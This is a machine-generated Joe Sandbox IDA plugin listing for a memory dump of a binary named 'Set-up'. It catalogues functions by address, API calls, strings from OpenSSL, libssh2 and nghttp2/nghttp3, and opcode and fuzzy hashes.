Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: memcpy
String ID: dynhds.c
API String ID: 3510742995-4001380837
Opcode ID: f6d102d5cc3b80bb5123cf3e89b203daa1ac1e5f8a8a8483cd7f35ab7414faf7
Instruction ID: ef49a86cd06dc10b60b6dcfca22075f2a91b1aed51f03b0852157be9b0862c61
Opcode Fuzzy Hash: f6d102d5cc3b80bb5123cf3e89b203daa1ac1e5f8a8a8483cd7f35ab7414faf7
Instruction Fuzzy Hash: 01419EB1600301AFDB189F14D881A27BBA8FF94304F04896DFC499B386EB70E914CBA5

Function 00298710 Relevance: 6.1, APIs: 4, Instructions: 114COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00298769
SleepConditionVariableCS.KERNEL32(?,?,000000FF), ref: 002987D1

Part of subcall function 002988B0: QueryPerformanceFrequency.KERNEL32(?), ref: 002988C1
Part of subcall function 002988B0: QueryPerformanceCounter.KERNEL32(?), ref: 002988CC

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: PerformanceQuery$ConditionCounterCriticalEnterFrequencySectionSleepVariable
String ID:
API String ID: 3112449238-0
Opcode ID: f0fa230b79af6bb98a986c814ecae83d60acc140e4b34b6a6e61b41721de1b70
Instruction ID: af2f304f341aae313b90a8089f17d7cbdae56cb9a45763fb799dbdf46444abfd
Opcode Fuzzy Hash: f0fa230b79af6bb98a986c814ecae83d60acc140e4b34b6a6e61b41721de1b70
Instruction Fuzzy Hash: 71312E76B10206ABEF089E71DC85B5BB768BB42310F58453CEC15D7191DF31ED2487A1

Function 003860E0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 107COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00387CCC,?,00000000,00387127,00387CCC,00000000,003ACAB7,001D1A70), ref: 003860E3
SetLastError.KERNEL32(00000000), ref: 003861A5

Strings

crypto/err/err.c, xrefs: 00386275
crypto/err/err_local.h, xrefs: 0038620C, 00386227, 00386257

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: ErrorLast
String ID: crypto/err/err.c$crypto/err/err_local.h
API String ID: 1452528299-2963546075
Opcode ID: c1dd1bf7649e9330f6890252f234be608f5c5598ae618b1d0a0e7c82dbe884f1
Instruction ID: 6cb2e5ff0fd7622b07ebf56c78a7efa538f41a4cc9102ec9593077c959c604b9
Opcode Fuzzy Hash: c1dd1bf7649e9330f6890252f234be608f5c5598ae618b1d0a0e7c82dbe884f1
Instruction Fuzzy Hash: F531F875A4030276E6233F68AC4BFA57710FB85B0DF4402B0FA149D2E7E7A65824CBA1

Function 00200639 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 77stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00200646

Part of subcall function 002BF340: _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?,002000B0,?,?,00000000,00000000,?), ref: 002BF35D

Strings

vssh/libssh2.c, xrefs: 002006A7, 002006C9
Unknown error in libssh2, xrefs: 002006EE, 002006FF
Attempt to set SFTP stats failed: %s, xrefs: 00200700

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: _time64strlen
String ID: Attempt to set SFTP stats failed: %s$Unknown error in libssh2$vssh/libssh2.c
API String ID: 3014104814-2439779272
Opcode ID: 8536dba70f8028cbd1731a9da28f2dd2507bdc18c5e8dada0e0192438bf304ce
Instruction ID: 93c18dd58ea1d2c3603b1ad9f80f42eddf7f9de075d20fd5ba3790e5c3ef105f
Opcode Fuzzy Hash: 8536dba70f8028cbd1731a9da28f2dd2507bdc18c5e8dada0e0192438bf304ce
Instruction Fuzzy Hash: C93109B6A14705AFD3059F18D841BAAF7E4BF44314F044178F5584B392E371BA24CB92

Function 00200584 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 73stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00200594

Part of subcall function 002BEE30: _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 002BEE4F

Strings

vssh/libssh2.c, xrefs: 002005F8
mkdir command failed: %s, xrefs: 0020062F
Unknown error in libssh2, xrefs: 0020061D, 0020062E

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: _time64strlen
String ID: Unknown error in libssh2$mkdir command failed: %s$vssh/libssh2.c
API String ID: 3014104814-3060469362
Opcode ID: fb54d87ba0d55fac754673822740b5a3023d835f760bfdc10ecbd44892ae32f3
Instruction ID: 9ac6b629a276cbcc5470cc632c06d10d22ad538e052cfbf6dc02dfd779d355de
Opcode Fuzzy Hash: fb54d87ba0d55fac754673822740b5a3023d835f760bfdc10ecbd44892ae32f3
Instruction Fuzzy Hash: 6821D8B6A14701AFD301DF28D88166AF7E8BF48324F058569F55C8B352E371EE24CB92

Function 00344460 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 70stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,003471DD,00000000,?,?), ref: 003444AC
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,00000000,?,?,?,?,?), ref: 003444FF

Part of subcall function 00387220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/user/eng_list.c,000000EB,user_get_first,00000000,003ABD91), ref: 00387262
Part of subcall function 00387220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/user/eng_list.c,000000EB,user_get_first,00000000,003ABD91), ref: 00387285
Part of subcall function 00387220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/user/eng_list.c,000000EB,user_get_first,00000000,003ABD91), ref: 003872C5
Part of subcall function 00387220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/user/eng_list.c,000000EB,user_get_first,00000000,003ABD91), ref: 003872E8

Strings

crypto/asn1/asn1_lib.c, xrefs: 00344487, 003444DB
ASN1_STRING_set, xrefs: 0034447D

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: strlen$strcpy$memcpy
String ID: ASN1_STRING_set$crypto/asn1/asn1_lib.c
API String ID: 1223016426-1431402185
Opcode ID: c434ecbbdb658640af43c9cc214d373ca4eeaf43c87a2ef032798977db085846
Instruction ID: 917b1cf3d58ce3396d70b32fbc5fc98127a71b20b182bd6dfc399bcdb65aec81
Opcode Fuzzy Hash: c434ecbbdb658640af43c9cc214d373ca4eeaf43c87a2ef032798977db085846
Instruction Fuzzy Hash: BC112B72A0431457DB226D249C42B2B77D8EB91721F1601B9FD25AF3C2EA61EC0083F2

Function 0027C220 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 245COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((size_t)(p - pbuf->last) == len,nghttp3_qpack.c,00000978), ref: 0027C4E7

Strings

nghttp3_qpack.c, xrefs: 0027C4DD
(size_t)(p - pbuf->last) == len, xrefs: 0027C4E2

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: _assert
String ID: (size_t)(p - pbuf->last) == len$nghttp3_qpack.c
API String ID: 1222420520-3384106985
Opcode ID: 0a121ff88f48ea985ab285916576296f5bb74a742c1bc282da38aef6cad8bd1e
Instruction ID: fd2f3806af9f516c3a83617d5241c29d4bce0851105ef82887ce3f2263fbe86a
Opcode Fuzzy Hash: 0a121ff88f48ea985ab285916576296f5bb74a742c1bc282da38aef6cad8bd1e
Instruction Fuzzy Hash: 0781E471A183009FD7089E3CC89072AB7D6EB99714F28C67CF9998B3E2D675DC488785

Function 0027C520 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 151COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((size_t)(p - rbuf->last) == len,nghttp3_qpack.c,000004D0,?,?,?,?,?,?,0027B434,?,?,00000000,00000000,?,?), ref: 0027C68A

Strings

(size_t)(p - rbuf->last) == len, xrefs: 0027C685
nghttp3_qpack.c, xrefs: 0027C680

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: _assert
String ID: (size_t)(p - rbuf->last) == len$nghttp3_qpack.c
API String ID: 1222420520-2159148421
Opcode ID: b43de77c6b28e073fffda718f9acafa9aa3f0276d0a3a52761a403ad528dd88a
Instruction ID: 94fb00bcf3c387c5e86ee4bff876cc467ff0af71f6477c44f16d754680735158
Opcode Fuzzy Hash: b43de77c6b28e073fffda718f9acafa9aa3f0276d0a3a52761a403ad528dd88a
Instruction Fuzzy Hash: 634101727192005FD7099E38D880B6AB7DAEBC9314F28C57CE88CCB392D935DC158B81

Function 00282600 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 151COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(nghttp3_buf_left(dbuf) >= nghttp3_buf_len(&decoder->dbuf) + len,nghttp3_qpack.c,00000EB7,?,?,?,00000000,?,?,?,?,?,?,?,?,?), ref: 002827D1

Strings

nghttp3_qpack.c, xrefs: 002827C7
nghttp3_buf_left(dbuf) >= nghttp3_buf_len(&decoder->dbuf) + len, xrefs: 002827CC

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: _assert
String ID: nghttp3_buf_left(dbuf) >= nghttp3_buf_len(&decoder->dbuf) + len$nghttp3_qpack.c
API String ID: 1222420520-645767172
Opcode ID: b64121bacfd705c2efc8a30b334533425fe16bb3b21174ceff91bc55dcee11b0
Instruction ID: 2a516b4a1a5183980595446cc2034a4070747551f72fe0f374bac0af7ae0c51c
Opcode Fuzzy Hash: b64121bacfd705c2efc8a30b334533425fe16bb3b21174ceff91bc55dcee11b0
Instruction Fuzzy Hash: 33510975A153148FD705AF28D880B1AB3DAFF88310F09867CED989B3D2EA34DD198B51

Function 0026C3A0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(0 == rv,nghttp2_map.c,000000CF), ref: 0026C50A

Strings

0 == rv, xrefs: 0026C505
nghttp2_map.c, xrefs: 0026C500

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: _assert
String ID: 0 == rv$nghttp2_map.c
API String ID: 1222420520-2488825769
Opcode ID: c4a6353804f29d43d5aa5e70a6a2ae199e25d694bfec9bba5399312c0ff7fd0d
Instruction ID: ab9ab95bae1b53c2ed3c86b50c9d2fc03df3a8378497aba22229c3a1aa2492e9
Opcode Fuzzy Hash: c4a6353804f29d43d5aa5e70a6a2ae199e25d694bfec9bba5399312c0ff7fd0d
Instruction Fuzzy Hash: 9A51E4756187069FC310DF19D88092AFBE4FF88754F15892EE998A7350E730E9A5CF82

Function 0026C220 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(data,nghttp2_map.c,000000DD), ref: 0026C394

Part of subcall function 0026C3A0: _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(0 == rv,nghttp2_map.c,000000CF), ref: 0026C50A

Strings

data, xrefs: 0026C38F
nghttp2_map.c, xrefs: 0026C38A

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: _assert
String ID: data$nghttp2_map.c
API String ID: 1222420520-1279632610
Opcode ID: 5f6276f0fa32c10ab5300eff3d5584ccb28289685f0851cd6943d06821279e8b
Instruction ID: 1cd708d56fa0e691c4ba50c7abb45aabe659d74c662972043e6c9ecfcbdb87ed
Opcode Fuzzy Hash: 5f6276f0fa32c10ab5300eff3d5584ccb28289685f0851cd6943d06821279e8b
Instruction Fuzzy Hash: 0A414875A187069FD704EF59D480A2AB7E1FF88700F24C92DE99AC7351E730E865CB92

Function 002745C0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,0000060E,?,?,?,?,?,?,?), ref: 0027468C

Strings

nghttp3_conn.c, xrefs: 00274682
tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS, xrefs: 00274687

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: _assert
String ID: nghttp3_conn.c$tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS
API String ID: 1222420520-4133914617
Opcode ID: 32a63f02b053c6728bf3569c3120fdc4f7e0f6942e7e18edd231e5861decaa04
Instruction ID: dd39d4b1cd6c5dea723f86db01b0c8462b2a009d014ee48e5c0b8c198ec6d8bc
Opcode Fuzzy Hash: 32a63f02b053c6728bf3569c3120fdc4f7e0f6942e7e18edd231e5861decaa04
Instruction Fuzzy Hash: 3131F6756106016BD210EE29EC85E6BB7ECEF86369F044629F95CC7281E731E824C7A2

Function 00262760 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMON

